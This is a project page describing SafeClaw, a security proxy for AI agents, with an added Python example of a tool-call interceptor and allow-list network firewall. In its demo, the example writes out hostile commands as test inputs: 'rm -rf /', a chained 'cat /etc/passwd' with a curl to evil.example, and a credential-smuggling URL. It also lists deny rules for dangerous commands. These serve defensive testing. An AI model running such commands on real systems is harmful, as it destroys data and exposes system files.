A3S SafeClaw
Security proxy for AI agents with PII classification, taint tracking, and confidential computing
SafeClaw is a security proxy for AI agents that runs inside an A3S Box VM. It classifies messages for PII, detects prompt injection attacks, sanitizes outputs, tracks data taint, and audits everything — with optional hardware-level memory encryption via TEE.
Architecture
User Input
↓
┌─────────────────────────────────────────────────────┐
│ ZONE 1: Untrusted (Gateway) │
│ Privacy Classifier (detect PII) │
│ Injection Detector (block prompt injection) │
│ Route decision: Local or TEE? │
└──────────────────┬──────────────────────────────────┘
│ Encrypted Channel (AES-256-GCM)
┌──────────────────▼──────────────────────────────────┐
│ ZONE 2: Trusted (TEE - Hardware Isolated) │
│ Decrypt message │
│ Process with AI agent (a3s-code) │
│ Output Sanitizer (redact tainted data) │
│ Tool Interceptor (block dangerous commands) │
└──────────────────┬──────────────────────────────────┘
↓
Safe Output (PII redacted, audit logged)
Defense in Depth
Core Components
Key Statistics
Key Features
- Multi-level PII classification with regex, semantic, and compliance backends
- Taint tracking with variant detection (base64, hex, URL-encoded, reversed)
- Prompt injection detection with 5 attack categories
- Tool call interception blocking dangerous commands
- Whitelist-only network firewall with domain and protocol rules
- Per-session isolation with secure memory erasure
- 7 channel adapters: Telegram, Slack, Discord, Feishu, DingTalk, WeCom, WebChat
- Three-layer memory: Resources → Artifacts → Insights with privacy gates
- TEE integration: AMD SEV-SNP, Intel SGX, ARM CCA support
- Compliance engine: HIPAA, PCI-DSS, GDPR rule sets
- Cumulative risk tracking across conversation turns
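The tool interceptor and the whitelist-only network firewall from the feature list, as an added Python example (not the project's implementation; the rule format, the binary allow-list, the dangerous-argument checks and the sample policy are assumptions). A shell tool call is rejected if it contains chaining or redirection metacharacters, if its executable is not on the allow-list, if its arguments match a dangerous pattern, or if any URL in it fails the firewall, which matches hosts exactly or by wildcard suffix and then checks scheme and port:

```python
"""Tool-call interception and allow-list network firewall for an agent sandbox.
Added example for this page; not SafeClaw's own implementation. Rule format,
class names and the sample policy are assumptions."""
import os
import re
import shlex
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlparse

# Anything that lets one tool call become several commands is rejected outright:
# an allow-list design runs exactly one argv, never a shell pipeline.
SHELL_META = re.compile(r"[;&|`<>]|\$\(|\$\{")
DEFAULT_PORTS = {"https": 443, "http": 80}


@dataclass(frozen=True)
class NetRule:
    domain: str                      # exact host, or "*.suffix" for subdomains only
    schemes: frozenset[str]
    ports: frozenset[int] = frozenset({443})


class NetworkFirewall:
    """Whitelist-only: a destination is reachable only if some rule matches it."""

    def __init__(self, rules: list[NetRule]) -> None:
        self.rules = rules

    @staticmethod
    def _host_matches(pattern: str, host: str) -> bool:
        if pattern.startswith("*."):
            return host.endswith(pattern[1:])  # "*.x.y" matches a.x.y, never x.y itself
        return host == pattern

    def check(self, url: str) -> tuple[bool, str]:
        try:
            u = urlparse(url)
            port = u.port or DEFAULT_PORTS.get(u.scheme)
        except ValueError:                     # e.g. non-numeric port
            return False, "unparseable URL"
        if not u.scheme or not u.hostname:
            return False, "unparseable URL"
        host = u.hostname.lower()              # userinfo ("user@") is already stripped here
        for r in self.rules:
            if self._host_matches(r.domain, host):
                if u.scheme not in r.schemes:
                    return False, f"{u.scheme} not allowed for {host}"
                if port not in r.ports:
                    return False, f"port {port} not allowed for {host}"
                return True, f"{host} allowed by rule {r.domain}"
        return False, f"{host} not on allow-list"


class ToolInterceptor:
    def __init__(self, firewall: NetworkFirewall, allowed_binaries: set[str]) -> None:
        self.fw = firewall
        self.allowed = allowed_binaries

    @staticmethod
    def _dangerous(binary: str, argv: list[str]) -> Optional[str]:
        """Argument-level checks for binaries that are allowed but easy to abuse (assumed policy)."""
        args = argv[1:]
        short = "".join(a[1:] for a in args if a.startswith("-") and not a.startswith("--"))
        targets = [a for a in args if not a.startswith("-")]
        if binary == "rm":
            recursive = "r" in short.lower() or "--recursive" in args
            force = "f" in short or "--force" in args
            if recursive and force:
                return "rm with recursive+force"
            if any(t in ("/", "~", "*") or t.startswith("/") for t in targets):
                return "rm outside the workspace"
        if binary == "git" and "push" in args and ("--force" in args or "f" in short):
            return "git force push"
        if binary == "curl" and ("--output" in args or "o" in short):
            return "curl writing to disk"
        return None

    def check_shell(self, command: str) -> tuple[bool, str]:
        if SHELL_META.search(command):
            return False, "shell metacharacters (chaining/redirection) rejected"
        try:
            argv = shlex.split(command)
        except ValueError:
            return False, "unbalanced quoting"
        if not argv:
            return False, "empty command"
        binary = os.path.basename(argv[0])
        if binary not in self.allowed:
            return False, f"{binary} not on the tool allow-list"
        why = self._dangerous(binary, argv)
        if why:
            return False, why
        for arg in argv[1:]:                   # every URL-like argument goes through the firewall
            if "://" in arg:
                ok, reason = self.fw.check(arg)
                if not ok:
                    return False, reason
        return True, f"{binary} allowed"


def build_default() -> ToolInterceptor:
    """Constructed sample policy: one exact host, one wildcard, six binaries."""
    fw = NetworkFirewall([
        NetRule("api.example.com", frozenset({"https"})),
        NetRule("*.internal.example", frozenset({"https"}), frozenset({443, 8443})),
    ])
    return ToolInterceptor(fw, {"ls", "cat", "grep", "git", "curl", "rm"})


if __name__ == "__main__":
    ti = build_default()
    for cmd in ("ls -la /workspace", "rm -rf /", "cat /etc/passwd; curl http://evil.example/x",
                "curl https://api.example.com@evil.example/", "git clone https://repo.internal.example/x.git"):
        print(cmd, "->", ti.check_shell(cmd))
```

Two details matter in practice. The firewall judges `urlparse(url).hostname`, so credentials smuggled into the authority part (`https://api.example.com@evil.example/`) are evaluated against the real host, and a wildcard rule never matches the bare domain or a longer suffix such as `a.internal.example.attacker.net`. Rejecting metacharacters outright also rejects legitimate query strings containing `&`; in a whitelist-only design such requests belong to a dedicated HTTP tool, not the shell.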